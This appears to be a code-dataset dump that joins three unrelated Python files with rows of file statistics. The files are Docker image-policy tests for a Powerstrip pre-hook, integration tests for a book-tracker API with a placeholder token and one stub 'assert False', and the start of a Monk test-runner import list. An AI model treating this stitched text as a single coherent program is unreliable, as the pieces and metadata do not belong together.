json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"good/container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
expected_json = lib.pre_hook_response("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 200)
self.assertEquals(rv.data, expected_json)
self.assertEquals(rv.headers['content-type'], "application/json")
def test_integration_create_user_fail(self):
"""
The status code is 403 when the user is bad.
"""
priu.app.config['ALLOWED_USER'] = "good"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"bad/container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 403)
def test_integration_create_official_success(self):
"""
The request is returned unmodified when the official is allowed.
"""
priu.app.config['ALLOWED_USER'] = "_"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
expected_json = lib.pre_hook_response("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 200)
self.assertEquals(rv.data, expected_json)
self.assertEquals(rv.headers['content-type'], "application/json")
def test_integration_create_office_fail(self):
"""
The status code is 403 when the user and only official Docker images
are allowed.
"""
priu.app.config['ALLOWED_USER'] = "_"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"bad/container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 403)
def _make_powerstrip_pre_hook_request(self, method, path, json):
"""
Format a Powerstrip pre-hook request JSON blob.
"""
return _json.dumps(dict(
PowerstripProtocolVersion=1,
Type="pre-hook",
ClientRequest=dict(
Method=method,
Request=path,
Body=json,
)))
if __name__ == '__main__':
unittest.main()
| 64.846154
| 749
| 0.657516
| 643
| 5,901
| 5.912908
| 0.191291
| 0.021042
| 0.037875
| 0.037875
| 0.897685
| 0.881904
| 0.881904
| 0.879011
| 0.879011
| 0.853761
| 0
| 0.009196
| 0.133876
| 5,901
| 90
| 750
| 65.566667
| 0.73469
| 0.050839
| 0
| 0.571429
| 0
| 0.071429
| 0.599416
| 0.550119
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.107143
| false
| 0
| 0.071429
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
480899c17096ae066bfc2073d74d0db397dfdc60
| 20,783
|
py
|
Python
|
tests/integration_test.py
|
brandonwarech/book-tracker-capstone
|
d2b66db94a9be6b1577e2d8eb4b5b9d8eb87b790
|
[
"Apache-2.0"
] | null | null | null |
tests/integration_test.py
|
brandonwarech/book-tracker-capstone
|
d2b66db94a9be6b1577e2d8eb4b5b9d8eb87b790
|
[
"Apache-2.0"
] | null | null | null |
tests/integration_test.py
|
brandonwarech/book-tracker-capstone
|
d2b66db94a9be6b1577e2d8eb4b5b9d8eb87b790
|
[
"Apache-2.0"
] | 1
|
2019-06-25T07:01:58.000Z
|
2019-06-25T07:01:58.000Z
|
#!/usr/bin/python
import pytest
import sys
import requests
import json
import random
# Auth header carrying the token the API accepts.
headers = {'X-API-KEY':'test_token'}
# Deliberately wrong token, used to exercise the auth-failure path.
invalid_headers = {'X-API-KEY':'wrong_token'}
# Random numeric id — NOTE(review): shadowed by a local of the same name in
# test_api_cloud_post_favorites_valid; confirm this module-level value is used.
random_num = random.randint(1111111,999999999)
#########################################################
# Cloud Tests #
#########################################################
def test_api_cloud_get_search_book():
    """Search endpoint returns the full expected result set for 'Phillip Laplante'.

    NOTE(review): hits the live Bluemix deployment over the network and pins
    the entire response body, so it is sensitive to any upstream data change.
    """
    req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/search/Phillip%20Laplante"
    r = requests.get(url = req_url, headers = headers)
    assert r.json() == { "body": { "books": [ { "author": [ "Phillip Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest", "title": "Easy PC maintenance and repair" }, { "author": [ "Phillip Laplante" ], "isbn": "0780347315", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Electrical Engineering Dictionary" }, { "author": [ "Phillip Laplante" ], "isbn": "9780849326974", "publication_date": 2000, "publisher": "Crc Pr I Llc", "title": "Dictionary of Computer Science, Engineering, and Technology" }, { "author": [ "Phillip Laplante" ], "isbn": "0780323394", "publication_date": 1997, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest/McGraw-Hill", "title": "Easy PC maintenance and repair" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849313767", "publication_date": 2003, "publisher": "Taylor and Francis", "title": "Software engineering for image processing systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "1420031244", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "AntiPatterns" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849372283", "publication_date": 2007, "publisher": "Taylor and Francis", "title": "What every engineer should know about software engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348158", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "A Practical Approach to Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348035", "publication_date": 1999, "publisher": "Institute of Electtrical and Electronics Engineers", "title": "Keys to Successful Software Development" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0780353412", "publication_date": 2001, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0780368169", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348028", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Successful Software Project Management" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0830644342", "publication_date": 1993, "publisher": "Windcrest/McGraw Hill", "title": "Fractal mania" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348387", "publication_date": 2001, "publisher": "Inst Elect & Electronic Engineers", "title": "Software Engineering Ssc" }, { "author": [ "Phillip A. Laplante" ], "isbn": "1590338898", "publication_date": 2003, "publisher": "Nova Science Publishers", "title": "Biocomputing" }, { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" }, { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9781439820858", "publication_date": 2011, "publisher": "CRC Press", "title": "Technical Writing A Practical Guide For Engineers And Scientists" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780849326912", "publication_date": 2001, "publisher": "CRC Press", "title": "Dictionary of computer science, engineering, and technology" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0314012621", "publication_date": 1993, "publisher": "West Pub. Co.", "title": "Using UNIX" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849330866", "publication_date": 2005, "publisher": "Taylor & Francis Books Ltd/CRC", "title": "Comprehensive dictionary of electrical engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849331285", "publication_date": 1999, "publisher": "CRC Press", "title": "Comprehensive dictionary of electrical engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0471228559", "publication_date": 2004, "publisher": "Wiley", "title": "Real-time system design and analysis" }, { "author": [ "Phillip A. Laplante", "Philip A. Laplante" ], "isbn": "9780780311527", "publication_date": 1993, "publisher": "IEEE Computer Society Press", "title": "Real-Time Systems Design and Analysis" }, { "author": [ "Philip A. Laplante", "Phillip A. Laplante" ], "isbn": "9781420059779", "publication_date": 2010, "publisher": "AUERBACH", "title": "Encyclopedia of Software Engineering, Three Volume Set" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819461032", "publication_date": 2006, "publisher": "IS&T", "title": "Real-time image processing 2006" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "0819456446", "publication_date": 2005, "publisher": "IS&T", "title": "Real-time imaging IX" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" }, { "author": [ "Phillip A. Laplante", "Colin J. Neill", "Philip A. Laplante" ], "isbn": "9781420064674", "publication_date": 2009, "publisher": "Auerbach Publications", "title": "Requirements engineering for software and systems" }, { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko" ], "isbn": "0780310683", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-time imaging" }, { "author": [ "William F. Gilreath", "Phillip A. Laplante" ], "isbn": "1402074166", "publication_date": 2003, "publisher": "Springer", "title": "Computer architecture" }, { "author": [ "Philip A. Laplante" ], "isbn": "9781420037807", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "Comprehensive Dictionary of Electrical Engineering" }, { "author": [ "Philip A. Laplante" ], "isbn": "9780780348240", "publication_date": 2000, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Signal and Image Processing" }, { "author": [ "Phillip A. Laplante", "Wolfgang A. Halang", "P. Laplante", "W.A. Halang" ], "isbn": "9780080425900", "publication_date": 1996, "publisher": "Pergamon", "title": "Real time programming 1995" }, { "author": [ "C. B. Johnson", "Divyendu Sinha", "Phillip A. Laplante" ], "isbn": "0819445630", "publication_date": 2003, "publisher": "SPIE", "title": "Low-light-level and real-time imaging systems, components, and applications" }, { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko", "Divyendu Sinha" ], "isbn": "0819420352", "publication_date": 1996, "publisher": "SPIE", "title": "Real-time imaging" }, { "author": [ "William F. Gilreath" ], "isbn": "146134980X", "publication_date": 2003, "publisher": "Springer US", "title": "Computer Architecture: A Minimalist Perspective" }, { "author": [ "Edward R. Dougherty" ], "isbn": "9780819417893", "publication_date": 1995, "publisher": "SPIE Optical Engineering Press", "title": "Introduction to real-time imaging" }, { "author": [ "Bad author - no name" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" }, { "author": [ "Colin J. Neill" ], "isbn": "1439861862", "publication_date": 2011, "publisher": "Auerbach Publications", "title": "Antipatterns" } ] }, "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_cloud_get_favorites_without_token():
    """GET /api/favorites without any auth header must be rejected."""
    endpoint = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/TEST"
    # No headers on purpose: the service should refuse the request outright.
    response = requests.get(url=endpoint)
    assert response.json() == {"message": "Token is missing"}
def test_api_cloud_with_incorrect_token():
    """GET /api/favorites with a bad token must return the token error."""
    endpoint = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/TEST"
    # `invalid_headers` is defined at module level and carries a bogus token.
    response = requests.get(url=endpoint, headers=invalid_headers)
    assert response.json() == {"message": "Incorrect token"}
def test_api_cloud_get_favorites_noresult():
    """Favorites lookup for an unknown user yields the [False] body."""
    endpoint = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/FDSFDSFS"
    response = requests.get(url=endpoint, headers=headers)
    expected = {"body": [False], "headers": {"Content-Type": "application/json"}, "statusCode": 200}
    assert response.json() == expected
def test_api_cloud_get_favorites_result():
    """Favorites lookup for a seeded user returns the known record."""
    endpoint = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/testforJin%40test.com"
    response = requests.get(url=endpoint, headers=headers)
    # Snapshot of the one favorite seeded for testforJin@test.com.
    expected_record = {
        "AUTHOR": "Test",
        "CATEGORY": None,
        "GENRE": None,
        "ISBN": "Jin123",
        "PUBLICATION_DATE": "string",
        "PUBLISHER": "string",
        "TITLE": "Jinny",
        "USER_ID": "testforJin@test.com",
    }
    assert response.json() == {
        "body": [expected_record],
        "headers": {"Content-Type": "application/json"},
        "statusCode": 200,
    }
def test_api_cloud_post_favorites_valid():
    """POST of a complete favorite record succeeds with one row affected."""
    endpoint = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/integrationtest"
    # Random ISBN so repeated runs do not collide on the primary key.
    random_num = random.randint(1111111, 999999999)
    payload = {
        "isbn": random_num,
        "author": "intg test",
        "title": "intg test",
        "publisher": "intg test",
        "publication_date": "intg test",
    }
    response = requests.post(url=endpoint, headers=headers, json=payload)
    assert response.json() == {
        "statusCode": 200,
        "headers": {"Content-Type": "application/json"},
        "body": "Success! 1 rows affected",
    }
def test_api_cloud_post_favorites_invalid():
    """POST missing the required 'isbn' field is rejected with an error."""
    endpoint = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/integrationtest"
    # 'isbn' deliberately absent from the payload.
    payload = {
        "author": "intg test",
        "title": "intg test",
        "publisher": "intg test",
        "publication_date": "intg test",
    }
    response = requests.post(url=endpoint, headers=headers, json=payload)
    assert response.json() == 'Error: Not all parameters supplied in POST Body json request payload (isbn, title, author)'
def test_api_cloud_delete_favorites():
assert False
#########################################################
# Local Tests #
#########################################################
def test_api_local_get_search_book():
    """Search the local API for 'Phillip Laplante' and compare the full JSON
    payload against a known-good snapshot of the book catalogue.

    Relies on module-level `headers` (auth token) and on the service running
    at 127.0.0.1:5000.  The expected body below is a literal snapshot:
    duplicates and upstream typos (e.g. "Electtrical") are intentional, and
    any change in the upstream catalogue will fail this comparison.
    """
    req_url = "http://127.0.0.1:5000/api/search/Phillip%20Laplante"
    r = requests.get(url = req_url, headers = headers)
    # Expected: statusCode/headers envelope plus the exact ordered book list.
    assert r.json() == { "body": { "books": [
        { "author": [ "Phillip Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest", "title": "Easy PC maintenance and repair" },
        { "author": [ "Phillip Laplante" ], "isbn": "0780347315", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Electrical Engineering Dictionary" },
        { "author": [ "Phillip Laplante" ], "isbn": "9780849326974", "publication_date": 2000, "publisher": "Crc Pr I Llc", "title": "Dictionary of Computer Science, Engineering, and Technology" },
        { "author": [ "Phillip Laplante" ], "isbn": "0780323394", "publication_date": 1997, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest/McGraw-Hill", "title": "Easy PC maintenance and repair" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0849313767", "publication_date": 2003, "publisher": "Taylor and Francis", "title": "Software engineering for image processing systems" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "1420031244", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "AntiPatterns" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0849372283", "publication_date": 2007, "publisher": "Taylor and Francis", "title": "What every engineer should know about software engineering" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348158", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "A Practical Approach to Real-Time Systems" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348035", "publication_date": 1999, "publisher": "Institute of Electtrical and Electronics Engineers", "title": "Keys to Successful Software Development" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0780353412", "publication_date": 2001, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Systems" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0780368169", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348028", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Successful Software Project Management" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0830644342", "publication_date": 1993, "publisher": "Windcrest/McGraw Hill", "title": "Fractal mania" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348387", "publication_date": 2001, "publisher": "Inst Elect & Electronic Engineers", "title": "Software Engineering Ssc" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "1590338898", "publication_date": 2003, "publisher": "Nova Science Publishers", "title": "Biocomputing" },
        { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" },
        { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9781439820858", "publication_date": 2011, "publisher": "CRC Press", "title": "Technical Writing A Practical Guide For Engineers And Scientists" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "9780849326912", "publication_date": 2001, "publisher": "CRC Press", "title": "Dictionary of computer science, engineering, and technology" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0314012621", "publication_date": 1993, "publisher": "West Pub. Co.", "title": "Using UNIX" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0849330866", "publication_date": 2005, "publisher": "Taylor & Francis Books Ltd/CRC", "title": "Comprehensive dictionary of electrical engineering" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0849331285", "publication_date": 1999, "publisher": "CRC Press", "title": "Comprehensive dictionary of electrical engineering" },
        { "author": [ "Phillip A. Laplante" ], "isbn": "0471228559", "publication_date": 2004, "publisher": "Wiley", "title": "Real-time system design and analysis" },
        { "author": [ "Phillip A. Laplante", "Philip A. Laplante" ], "isbn": "9780780311527", "publication_date": 1993, "publisher": "IEEE Computer Society Press", "title": "Real-Time Systems Design and Analysis" },
        { "author": [ "Philip A. Laplante", "Phillip A. Laplante" ], "isbn": "9781420059779", "publication_date": 2010, "publisher": "AUERBACH", "title": "Encyclopedia of Software Engineering, Three Volume Set" },
        { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819461032", "publication_date": 2006, "publisher": "IS&T", "title": "Real-time image processing 2006" },
        { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "0819456446", "publication_date": 2005, "publisher": "IS&T", "title": "Real-time imaging IX" },
        { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" },
        { "author": [ "Phillip A. Laplante", "Colin J. Neill", "Philip A. Laplante" ], "isbn": "9781420064674", "publication_date": 2009, "publisher": "Auerbach Publications", "title": "Requirements engineering for software and systems" },
        { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko" ], "isbn": "0780310683", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-time imaging" },
        { "author": [ "William F. Gilreath", "Phillip A. Laplante" ], "isbn": "1402074166", "publication_date": 2003, "publisher": "Springer", "title": "Computer architecture" },
        { "author": [ "Philip A. Laplante" ], "isbn": "9781420037807", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "Comprehensive Dictionary of Electrical Engineering" },
        { "author": [ "Philip A. Laplante" ], "isbn": "9780780348240", "publication_date": 2000, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Signal and Image Processing" },
        { "author": [ "Phillip A. Laplante", "Wolfgang A. Halang", "P. Laplante", "W.A. Halang" ], "isbn": "9780080425900", "publication_date": 1996, "publisher": "Pergamon", "title": "Real time programming 1995" },
        { "author": [ "C. B. Johnson", "Divyendu Sinha", "Phillip A. Laplante" ], "isbn": "0819445630", "publication_date": 2003, "publisher": "SPIE", "title": "Low-light-level and real-time imaging systems, components, and applications" },
        { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko", "Divyendu Sinha" ], "isbn": "0819420352", "publication_date": 1996, "publisher": "SPIE", "title": "Real-time imaging" },
        { "author": [ "William F. Gilreath" ], "isbn": "146134980X", "publication_date": 2003, "publisher": "Springer US", "title": "Computer Architecture: A Minimalist Perspective" },
        { "author": [ "Edward R. Dougherty" ], "isbn": "9780819417893", "publication_date": 1995, "publisher": "SPIE Optical Engineering Press", "title": "Introduction to real-time imaging" },
        { "author": [ "Bad author - no name" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" },
        { "author": [ "Colin J. Neill" ], "isbn": "1439861862", "publication_date": 2011, "publisher": "Auerbach Publications", "title": "Antipatterns" }
    ] }, "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_local_get_favorites_without_token():
    """Local GET /api/favorites without an auth header must be rejected."""
    endpoint = "http://127.0.0.1:5000/api/favorites/TEST"
    # No headers on purpose: the service should refuse the request outright.
    response = requests.get(url=endpoint)
    assert response.json() == {"message": "Token is missing"}
def test_api_local_with_incorrect_token():
    """Local GET /api/favorites with a bad token returns the token error."""
    endpoint = "http://127.0.0.1:5000/api/favorites/TEST"
    # `invalid_headers` is defined at module level and carries a bogus token.
    response = requests.get(url=endpoint, headers=invalid_headers)
    assert response.json() == {"message": "Incorrect token"}
def test_api_local_get_favorites_noresult():
    """Local favorites lookup for an unknown user yields the [False] body."""
    endpoint = "http://127.0.0.1:5000/api/favorites/FDSFDSFS"
    response = requests.get(url=endpoint, headers=headers)
    expected = {"body": [False], "headers": {"Content-Type": "application/json"}, "statusCode": 200}
    assert response.json() == expected
def test_api_local_get_favorites_result():
    """Local favorites lookup for a seeded user returns the known record."""
    endpoint = "http://127.0.0.1:5000/api/favorites/testforJin%40test.com"
    response = requests.get(url=endpoint, headers=headers)
    # Snapshot of the one favorite seeded for testforJin@test.com.
    expected_record = {
        "AUTHOR": "Test",
        "CATEGORY": None,
        "GENRE": None,
        "ISBN": "Jin123",
        "PUBLICATION_DATE": "string",
        "PUBLISHER": "string",
        "TITLE": "Jinny",
        "USER_ID": "testforJin@test.com",
    }
    assert response.json() == {
        "body": [expected_record],
        "headers": {"Content-Type": "application/json"},
        "statusCode": 200,
    }
def test_api_local_post_favorites_valid():
    """Local POST of a complete favorite record succeeds (HTTP 200 + body)."""
    endpoint = "http://127.0.0.1:5000/api/favorites/integrationtest"
    # Random ISBN so repeated runs do not collide on the primary key.
    random_num = random.randint(1111111, 999999999)
    payload = {
        "isbn": random_num,
        "author": "intg test",
        "title": "intg test",
        "publisher": "intg test",
        "publication_date": "intg test",
    }
    response = requests.post(url=endpoint, headers=headers, json=payload)
    assert response.status_code == 200
    assert response.json() == {
        "statusCode": 200,
        "headers": {"Content-Type": "application/json"},
        "body": "Success! 1 rows affected",
    }
def test_api_local_post_favorites_invalid():
    """Local POST missing the required 'isbn' field must be rejected.

    Bug fix: the previous body was a copy-paste of the *valid* test — it sent
    a complete payload (isbn included) and asserted success, so the invalid
    path was never exercised locally.  This now mirrors the cloud counterpart
    (test_api_cloud_post_favorites_invalid): omit 'isbn' and expect the
    parameter-validation error message.
    """
    req_url = "http://127.0.0.1:5000/api/favorites/integrationtest"
    # 'isbn' deliberately omitted: the API requires isbn, title and author.
    data = {
        "author": "intg test",
        "title": "intg test",
        "publisher": "intg test",
        "publication_date": "intg test",
    }
    r = requests.post(url=req_url, headers=headers, json=data)
    assert r.json() == 'Error: Not all parameters supplied in POST Body json request payload (isbn, title, author)'
| 205.772277
| 7,670
| 0.674542
| 2,340
| 20,783
| 5.902564
| 0.124359
| 0.095569
| 0.067188
| 0.069505
| 0.979511
| 0.977339
| 0.960107
| 0.959094
| 0.959094
| 0.957646
| 0
| 0.080866
| 0.128903
| 20,783
| 101
| 7,671
| 205.772277
| 0.682059
| 0.004956
| 0
| 0.567568
| 0
| 0.108108
| 0.636916
| 0.002056
| 0
| 0
| 0
| 0
| 0.216216
| 1
| 0.202703
| false
| 0
| 0.067568
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4819c50ce7a2ad019e99fe5127d6f4cd7a8d4778
| 31,733
|
py
|
Python
|
monk/system_unit_tests/gluon/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 542
|
2019-11-10T12:09:31.000Z
|
2022-03-28T11:39:07.000Z
|
monk/system_unit_tests/gluon/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 117
|
2019-11-12T09:39:24.000Z
|
2022-03-12T00:20:41.000Z
|
monk/system_unit_tests/gluon/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 246
|
2019-11-09T21:53:24.000Z
|
2022-03-29T00:57:07.000Z
|
import os
import sys
import time
from test_optimizer_sgd import test_optimizer_sgd
from test_optimizer_nesterov_sgd import test_optimizer_nesterov_sgd
from test_optimizer_rmsprop import test_optimizer_rmsprop
from test_optimizer_momentum_rmsprop import test_optimizer_momentum_rmsprop
from test_optimizer_adam import test_optimizer_adam
from test_optimizer_adamax import test_optimizer_adamax
from test_optimizer_adadelta import test_optimizer_adadelta
from test_optimizer_adagrad import test_optimizer_adagrad
from test_optimizer_nadam import test_optimizer_nadam
from test_optimizer_signum import test_optimizer_signum
from test_loss_l1 import test_loss_l1
from test_loss_l2 import test_loss_l2
from test_loss_softmax_crossentropy import test_loss_softmax_crossentropy
from test_loss_crossentropy import test_loss_crossentropy
from test_loss_sigmoid_binary_crossentropy import test_loss_sigmoid_binary_crossentropy
from test_loss_binary_crossentropy import test_loss_binary_crossentropy
from test_loss_kldiv import test_loss_kldiv
from test_loss_poisson_nll import test_loss_poisson_nll
from test_loss_huber import test_loss_huber
from test_loss_hinge import test_loss_hinge
from test_loss_squared_hinge import test_loss_squared_hinge
from test_layer_convolution1d import test_layer_convolution1d
from test_layer_convolution2d import test_layer_convolution2d
from test_layer_convolution3d import test_layer_convolution3d
from test_layer_transposed_convolution1d import test_layer_transposed_convolution1d
from test_layer_transposed_convolution2d import test_layer_transposed_convolution2d
